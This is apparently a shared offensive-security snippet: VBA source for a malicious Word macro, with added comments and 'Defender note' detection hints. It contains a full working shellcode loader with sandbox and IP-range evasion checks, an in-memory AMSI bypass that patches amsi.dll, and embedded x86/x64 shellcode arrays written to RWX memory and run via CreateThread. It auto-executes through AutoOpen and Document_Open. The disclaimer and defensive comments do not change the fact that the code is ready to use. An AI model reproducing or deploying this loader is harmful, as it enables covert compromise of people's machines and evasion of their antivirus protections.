All exploits are written by myself and are for educational purposes only; I would not be liable for any misuse!
### Macros with Several Variations
Credit to Ocktoberfirst on this initial macro
' Win32 / PSAPI imports used by the procedures below.
' Several imports are bound under neutral local names via Alias (GetPrAddr,
' VirtPro, getmod, patched). The real export name still appears in the Alias
' string literal, so static scanners that match on API names will flag these
' lines as-is; the renaming only affects how the rest of the source reads.
' Defender note: the VirtualAlloc + RtlFillMemory + CreateThread combination
' from an Office process is the classic macro shellcode-loader pattern; API
' telemetry from WINWORD.EXE and the ASR rule "Block Win32 API calls from
' Office macros" cover it.
' MODULEINFO is declared here but only referenced by an unused local in amcheck.
Type MODULEINFO
lpBaseOfDLL As Long
SizeOfImage As Long
EntryPoint As Long
End Type
' Used by MyMacro for its wall-clock sandbox check.
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
' Used by MyMacro to start a thread at the VirtualAlloc'd buffer.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
' MyMacro calls this with flAllocationType &H3000 and flProtect &H40 (RWX).
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
' GetProcAddress: used by patch to resolve an amsi.dll export.
Private Declare PtrSafe Function GetPrAddr Lib "KERNEL32" Alias "GetProcAddress" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
' VirtualProtect: the third parameter is VirtualProtect's flNewProtect despite its local name.
Private Declare PtrSafe Function VirtPro Lib "KERNEL32" Alias "VirtualProtect" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProcess As LongPtr, lpflOldProtect As LongPtr) As LongPtr
' GetModuleHandleA: used by patch to get the amsi.dll base.
Private Declare PtrSafe Function getmod Lib "KERNEL32" Alias "GetModuleHandleA" (ByVal lpLibFileName As String) As LongPtr
' RtlFillMemory: used as a one-byte-at-a-time write primitive by MyMacro and patch.
Private Declare PtrSafe Sub patched Lib "KERNEL32" Alias "RtlFillMemory" (Destination As Any, ByVal Length As Long, ByVal Fill As Byte)
' Module enumeration for amcheck (handle -1 at the call site is the current-process pseudo-handle).
Public Declare PtrSafe Function EnumProcessModulesEx Lib "psapi.dll" (ByVal hProcess As LongPtr, lphModule As LongPtr, ByVal cb As LongPtr, lpcbNeeded As LongPtr, ByVal dwFilterFlag As LongPtr) As LongPtr
Public Declare PtrSafe Function GetModuleBaseName Lib "psapi.dll" Alias "GetModuleBaseNameA" (ByVal hProcess As LongPtr, ByVal hModule As LongPtr, ByVal lpFileName As String, ByVal nSize As LongPtr) As LongPtr
Function MyMacro()
'Get current time, sleep 4 seconds, get time again. If less than 4 seconds have passed, assume we are in a AV sandbox and exit without running rest of macro.
Dim myTime
myTime = Time
Dim Timein As Date
Timein = Date + myTime
Sleep (4000)
Dim second_time
second_time = Time
Dim Timeout As Date
Timeout = Date + second_time
Dim subtime As Variant
subtime = DateDiff("s", Timein, Timeout)
Dim vOut As Integer
vOut = CInt(subtime)
If subtime < 3.5 Then
Exit Function
End If
'initialize variables
Dim Is64 As Boolean
Dim StrFile As String
Dim check As Boolean
Dim buf As Variant
Dim addr As LongPtr
Dim counter As LongPtr
Dim data As String
Dim res As LongPtr
Dim ipcheck As Boolean
ipcheck = False
Dim inscope As String
'define in scope IP's. We can use wildcards here.
inscope = "192.168.*"
'Call ip check function. Returns True if machine IP is in scope. If True, pass. If False, exit.
ipcheck = getMyIP(inscope)
If ipcheck Then
Else
Exit Function
End If
'Dynamically resolve amsi.dll
StrFile = Dir("c:\windows\system32\a?s?.d*")
'Call architecture function to determine if we are in 32 bit or 64 bit word. 64 bit returns True.
Is64 = arch()
'Call amsi check function to determine if amsi.dll is loaded into Word. This is the case in word 2019+. Returns True if Amsi is found.
check = amcheck(StrFile)
'This portion to delete document body and replace with auto text (the "legit" content)
'ActiveDocument.Content.Select
'Selection.Delete
'ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=True
'If amsi is found, call amsi patching function. Pass architecture of Word as additional arg to function.
If check Then
patch StrFile, Is64
End If
'Include shellcode for both x86 and x64.
'also no encryption routine on this shellcode, might have to look into something like xor or rot or caeser cipher to strengten it
If Is64 Then
buf = Array(49, 125, 184, 25, 37, 29, 1, 53, 53, 53, 118, 134, 118, 133, 135, 125, 102, 7, 154, 125, 192, 135, 149, 125, 192, 135, 77, 125, 192, 135, 85, 134, 139, 125, 68, 236, 127, 127, 125, 192, 167, 133, 130, 102, 254, 125, 102, 245, 225, 113, _
150, 177, 55, 97, 85, 118, 246, 254, 66, 118, 54, 246, 23, 34, 135, 125, 192, 135, 85, 118, 134, 192, 119, 113, 125, 54, 5, 155, 182, 173, 77, 64, 55, 68, 186, 167, 53, 53, 53, 192, 181, 189, 53, 53, 53, 125, 186, 245, 169, 156, _
125, 54, 5, 133, 192, 125, 77, 121, 192, 117, 85, 126, 54, 5, 24, 139, 130, 102, 254, 125, 52, 254, 118, 192, 105, 189, 125, 54, 11, 125, 102, 245, 118, 246, 254, 66, 225, 118, 54, 246, 109, 21, 170, 38, 129, 56, 129, 89, 61, 122, _
110, 6, 170, 13, 141, 121, 192, 117, 89, 126, 54, 5, 155, 118, 192, 65, 125, 121, 192, 117, 81, 126, 54, 5, 118, 192, 57, 189, 118, 141, 125, 54, 5, 118, 141, 147, 142, 143, 118, 141, 118, 142, 118, 143, 125, 184, 33, 85, 118, 135, _
52, 21, 141, 118, 142, 143, 125, 192, 71, 30, 128, 52, 52, 52, 146, 125, 102, 16, 136, 126, 243, 172, 158, 163, 158, 163, 154, 169, 53, 118, 139, 125, 190, 22, 126, 252, 247, 129, 172, 91, 60, 52, 10, 136, 136, 125, 190, 22, 136, 143, _
130, 102, 245, 130, 102, 254, 136, 136, 126, 239, 111, 139, 174, 220, 53, 53, 53, 53, 52, 10, 29, 67, 53, 53, 53, 102, 110, 103, 99, 102, 107, 109, 99, 105, 110, 99, 107, 107, 53, 143, 125, 190, 246, 126, 252, 245, 240, 54, 53, 53, _
130, 102, 254, 136, 136, 159, 56, 136, 126, 239, 140, 190, 212, 251, 53, 53, 53, 53, 52, 10, 29, 8, 53, 53, 53, 100, 120, 161, 155, 101, 109, 138, 157, 148, 121, 130, 150, 169, 119, 107, 172, 123, 175, 101, 171, 125, 137, 134, 173, 151, _
155, 125, 124, 119, 108, 175, 148, 142, 161, 133, 119, 106, 134, 127, 106, 106, 134, 136, 134, 138, 170, 109, 158, 132, 131, 109, 153, 154, 105, 137, 165, 125, 124, 163, 125, 143, 159, 155, 128, 150, 158, 164, 133, 109, 121, 160, 129, 135, 134, 157, _
124, 120, 105, 139, 106, 163, 164, 128, 158, 156, 143, 165, 158, 141, 150, 166, 136, 109, 148, 162, 142, 124, 142, 109, 155, 153, 173, 174, 98, 109, 148, 159, 142, 135, 106, 125, 150, 167, 130, 143, 167, 152, 141, 119, 134, 132, 124, 167, 102, 162, _
159, 160, 123, 126, 169, 163, 110, 131, 107, 155, 159, 109, 103, 165, 153, 168, 174, 138, 161, 105, 109, 165, 105, 142, 163, 98, 158, 173, 173, 162, 172, 125, 133, 164, 170, 107, 173, 139, 155, 153, 160, 162, 122, 170, 125, 168, 122, 137, 133, 157, _
158, 155, 123, 158, 167, 133, 135, 175, 170, 134, 107, 156, 150, 121, 165, 133, 168, 155, 119, 148, 131, 132, 102, 106, 126, 165, 125, 110, 160, 120, 150, 134, 125, 157, 142, 53, 125, 190, 246, 136, 143, 118, 141, 130, 102, 254, 136, 125, 237, 53, _
103, 221, 185, 53, 53, 53, 53, 133, 136, 136, 126, 252, 247, 32, 138, 99, 112, 52, 10, 125, 190, 251, 159, 63, 148, 125, 190, 38, 159, 84, 143, 135, 157, 181, 104, 53, 53, 126, 190, 21, 159, 57, 118, 142, 126, 239, 170, 123, 211, 187, _
53, 53, 53, 53, 52, 10, 130, 102, 245, 136, 143, 125, 190, 38, 130, 102, 254, 130, 102, 254, 136, 136, 126, 252, 247, 98, 59, 77, 176, 52, 10, 186, 245, 170, 84, 125, 252, 246, 189, 72, 53, 53, 126, 239, 121, 37, 106, 21, 53, 53, _
53, 53, 52, 10, 125, 52, 4, 169, 55, 32, 223, 29, 138, 53, 53, 53, 136, 142, 159, 117, 143, 126, 190, 6, 246, 23, 69, 126, 252, 245, 53, 69, 53, 53, 126, 239, 141, 217, 136, 26, 53, 53, 53, 53, 52, 10, 125, 200, 136, 136, _
125, 190, 28, 125, 190, 38, 125, 190, 15, 126, 252, 245, 53, 85, 53, 53, 126, 190, 46, 126, 239, 71, 203, 190, 23, 53, 53, 53, 53, 52, 10, 125, 184, 249, 85, 186, 245, 169, 231, 155, 192, 60, 125, 54, 248, 186, 245, 170, 7, 141, _
248, 141, 159, 53, 142, 126, 252, 247, 37, 234, 215, 139, 52, 10)
Else
buf = Array(141,153,254,113,113,113,17,64,163,248,148,21,250,35,65,250,35,125,250,35,101,64,142,126,198,59,87,250,3,89,64,177,221,77,16,13,115,93,81,176,190,124,112,182,56,4,158,35,38,250,35,97,250,51,77,112,161,250,49,9,244,177,5,61,112,161,250,41,81,33,250,57,105,112,162,244,184,5,77,56,64, _
142,250,69,250,112,167,64,177,176,190,124,221,112,182,73,145,4,133,114,12,137,74,12,85,4,145,41,250,41,85,112,162,23,250,125,58,250,41,109,112,162,250,117,250,112,161,248,53,85,85,42,42,16,40,43,32,142,145,41,46,43,250,99,152,241,142,142,142,44,25,31,20,5,113,25,6,24,31,24,37, _
25,61,6,87,118,142,164,64,170,34,34,34,34,34,153,79,113,113,113,60,30,11,24,29,29,16,94,68,95,65,81,89,38,24,31,21,30,6,2,81,63,37,81,71,95,64,74,81,37,3,24,21,20,31,5,94,70,95,65,74,81,3,7,75,64,64,95,65,88,81,29,24,26,20,81,54,20,18,26,30, _
113,25,75,39,8,214,142,164,34,34,27,114,34,34,25,202,112,113,113,153,30,112,113,113,94,24,64,16,61,50,92,11,54,19,37,19,7,60,20,69,6,27,41,64,29,32,22,2,11,60,54,23,92,56,38,1,61,38,64,92,16,3,19,65,64,8,55,37,54,69,21,39,25,57,11,8,71,61,3,3, _
34,36,26,4,60,58,70,27,26,51,32,35,56,58,64,30,8,73,72,53,38,30,33,68,59,6,66,62,62,72,16,9,70,46,52,55,2,7,40,5,43,26,19,9,61,51,32,16,21,41,20,32,25,0,67,4,24,33,72,2,72,46,29,66,71,29,21,7,30,21,59,22,57,55,39,4,39,3,60,59, _
21,46,27,20,60,20,2,18,64,4,29,58,41,30,67,28,27,52,50,59,65,37,60,51,25,55,64,41,51,56,46,58,67,32,34,8,53,28,66,22,2,20,24,11,60,32,20,2,34,16,25,65,18,68,41,37,52,28,5,43,69,51,51,36,20,72,46,0,31,0,4,55,64,37,11,7,6,26,59,46, _
43,18,34,46,32,60,26,58,28,26,3,72,4,8,28,59,25,4,62,33,46,2,9,69,27,68,29,113,33,25,38,248,238,183,142,164,248,183,34,25,113,115,25,245,34,34,34,38,34,39,25,154,36,95,74,142,164,231,27,123,46,34,34,34,34,39,25,92,119,105,10,142,164,244,177,4,101,25,249,98, _
113,113,25,53,129,68,145,142,164,62,4,144,153,59,113,113,113,27,49,25,113,97,113,113,25,113,113,49,113,34,25,41,213,34,148,142,164,226,34,34,248,150,38,25,113,81,113,113,34,39,25,99,231,248,147,142,164,244,177,5,190,250,118,112,178,244,177,4,148,41,178,46,153,14,142,142,142,64,72,67, _
95,64,71,73,95,69,72,95,71,71,113,202,145,108,91,123,25,215,228,204,236,142,164,77,119,13,123,241,138,145,4,116,202,54,98,3,30,27,113,34,142,164)
End If
'Create new space in memory within current process
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
'Copy shellcode to newly created memory
For counter = LBound(buf) To UBound(buf)
data = Hex(buf(counter))
patched ByVal (addr + counter), 1, ByVal ("&H" & data)
Next counter
'create thread to execute shellcode
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Function arch() As Boolean
'check architecture of current word process
' Compile-time constant: Win64 is True when the hosting Office build is 64-bit,
' so this reflects the Word process bitness rather than the OS. MyMacro uses the
' result to pick the shellcode array and patch uses it to pick the offsets.
#If Win64 Then
arch = True
#Else
arch = False
#End If
End Function
Public Function getMyIP(ipcheck As String) As Boolean
'uses WMI to get all IP's associated with machine. Each one is then checked against the wildcarded IP/network. If a match is found, returns True
' ipcheck: a VBA Like pattern (MyMacro passes "192.168.*").
' Returns True if any address string on an IP-enabled adapter matches; the
' Boolean default of False covers the no-match case. Both loops keep running
' after a match (there is no Exit For). counter and ips() are declared but unused.
' Defender note: keying execution to the local address range is a targeting /
' sandbox-evasion technique; a winmgmts query for
' Win32_NetworkAdapterConfiguration issued from WINWORD.EXE is an observable
' worth alerting on, and the macro does nothing at all on out-of-scope hosts.
Dim objWMI As Object
Dim objQuery As Object
Dim objQueryItem As Object
Dim vIpAddress
Dim counter As Integer
Dim ips() As String
Set objWMI = GetObject("winmgmts:\\.\root\cimv2")
Set objQuery = objWMI.ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled = True")
For Each objQueryItem In objQuery
For Each vIpAddress In objQueryItem.ipaddress
If CStr(vIpAddress) Like ipcheck Then
getMyIP = True
End If
Next
Next
End Function
Function amcheck(StrFile As String) As Boolean
'Checks for amsi.dll in word process. If found, returns True
' StrFile: the module file name to look for (MyMacro passes the Dir() result of
' the wildcard c:\windows\system32\a?s?.d*). -1 is the GetCurrentProcess
' pseudo-handle, so the list is Word's own loaded modules. Each base name is read
' into a 50-byte zero-filled buffer and only its first 8 characters are compared,
' so trailing NUL padding is never trimmed; the loop does not stop on a match.
' NOTE(review): cbNeeded and i are not declared in this block; with no Option
' Explicit visible they are implicit Variants. mdi is declared but unused.
' Defender note: self-module enumeration followed by VirtualProtect on amsi.dll
' (see patch) from an Office process is a recognisable AMSI-tamper sequence.
Dim szProcessName As String
Dim mdi As MODULEINFO
Dim hMod(0 To 1023) As LongPtr
Dim res As LongPtr
amcheck = False
res = EnumProcessModulesEx(-1, hMod(0), 1024, cbNeeded, &H3)
For i = 0 To UBound(hMod)
szProcessName = String$(50, 0)
GetModuleBaseName -1, hMod(i), szProcessName, Len(szProcessName)
If Left(szProcessName, 8) = StrFile Then
amcheck = True
End If
Next i
End Function
Function patch(StrFile As String, Is64 As Boolean)
'patches amsi.dll in memory in order to disable it. Loads memory address of amsi.dll and then locates the AmsiUacInitialize function within it. The AmsiScanBuffer and AmsiScanString functions are located via relative offset from AmsiUacInitialize and then overwritten with a nop and then a ret to disable them.
' Depending on architecture these offsets vary, so a case is included for x86 and x64
' StrFile: module name resolved by MyMacro; Is64: result of arch().
' The export name is assembled from Chr() pieces so the literal does not appear in
' the source. Each patch site is GetProcAddress(that export) minus a hard-coded
' offset (96 then 352 on x64, 80 then 256 on x86); those offsets are tied to a
' particular amsi.dll build and are not validated before writing.
' VirtPro(..., 32, 64, ...) sets PAGE_EXECUTE_READWRITE (&H40) on 32 bytes, then
' two one-byte writes place &H90 &HC3 (nop; ret). Return values of VirtPro and
' the writes are not checked. No explicit return value is set (implicit Variant).
' Defender note: in-memory modification of amsi.dll code pages from WINWORD.EXE
' is a well-known AMSI-tamper pattern; integrity checks on AmsiScanBuffer /
' AmsiScanString and telemetry for VirtualProtect targeting amsi.dll detect it.
Dim lib As LongPtr
Dim Func_addr As LongPtr
Dim temp As LongPtr
Dim old As LongPtr
Dim off As Integer
lib = getmod(StrFile)
If Is64 Then
off = 96
Else
off = 80
End If
Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off
temp = VirtPro(ByVal Func_addr, 32, 64, 0)
patched ByVal (Func_addr), 1, ByVal ("&H" & "90")
patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3")
temp = VirtPro(ByVal Func_addr, 32, old, 0)
If Is64 Then
off = 352
Else
off = 256
End If
Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off
temp = VirtPro(ByVal Func_addr, 32, 64, old)
patched ByVal (Func_addr), 1, ByVal ("&H" & "90")
patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3")
temp = VirtPro(ByVal Func_addr, 32, old, 0)
End Function
'macro name is test which calls the main method
Sub test()
' Manually runnable entry point (Macros dialog); same body as the auto-exec subs below.
MyMacro
End Sub
Sub AutoOpen()
' Word auto-execution macro: runs when the document is opened with macros enabled.
' Defender note: AutoOpen is one of the standard auto-exec names static analyzers
' flag; blocking macros in files carrying Mark of the Web, or requiring signed
' macros, stops this path before MyMacro runs.
MyMacro
End Sub
Sub Document_Open()
' Document-level open event; duplicates AutoOpen so the payload fires from
' either entry point. Same defender guidance as AutoOpen applies.
MyMacro
End Sub